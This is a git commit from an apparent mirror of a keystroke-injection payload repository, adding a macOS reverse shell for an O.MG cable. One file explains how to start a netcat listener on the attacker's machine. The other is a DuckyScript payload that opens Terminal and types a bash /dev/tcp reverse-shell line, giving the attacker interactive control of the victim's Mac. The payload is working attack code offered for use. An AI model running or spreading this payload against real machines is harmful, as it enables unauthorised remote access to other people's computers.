mirror of https://github.com/hak5/omg-payloads.git
Add files via upload
parent
2c7e3869be
commit
798df5a414
|
@ -0,0 +1,17 @@
|
|||
# This is, at heart, is a simple reverse shell to gain access to another MacOSX device. I'm looking into creating a tight shell that can run like a daemon
|
||||
# but that is a wet dream atm.
|
||||
|
||||
# FIRST STEP(s):
|
||||
# run "nc -l <any port>" on the attackers machine
|
||||
# This initialzes your computers listening protocol to look for TCP connections
|
||||
**IMPORTANT**
|
||||
# open another Terminal window and run "ipconfig getifaddr en0" to obtain your computers local ip (this is important for the next step)
|
||||
|
||||
# NEXT STEP:
|
||||
# Then simply run the script in your O.MG UI when the cable is connected
|
||||
|
||||
# An example of the code run on the attackers computer:
|
||||
nc -l 80
|
||||
|
||||
# An example of the code run on the victims computer:
|
||||
bash -i >& /dev/tcp/10.0.0.1/80 0>&1
|
|
@ -0,0 +1,20 @@
|
|||
REM Title: MacOSX Reverse Shell (v1.0)
|
||||
REM Author: fatherthomas
|
||||
REM Description: Allows you to traverse through any MacOS system and use bash commands to do what you please
|
||||
REM Target: MacOS Monterey (or older versions)
|
||||
REM Version: 1.0
|
||||
|
||||
GUI SPACE
|
||||
DELAY 100
|
||||
STRING Terminal
|
||||
DELAY 200
|
||||
ENTER
|
||||
DELAY 900
|
||||
STRING bash
|
||||
DELAY 100
|
||||
ENTER
|
||||
DELAY 500
|
||||
STRING bash -i >& /dev/tcp/<attacker ip>/<port> 0>&1
|
||||
DELAY 200
|
||||
ENTER
|
||||
DELAY 1000
|
Loading…
Reference in New Issue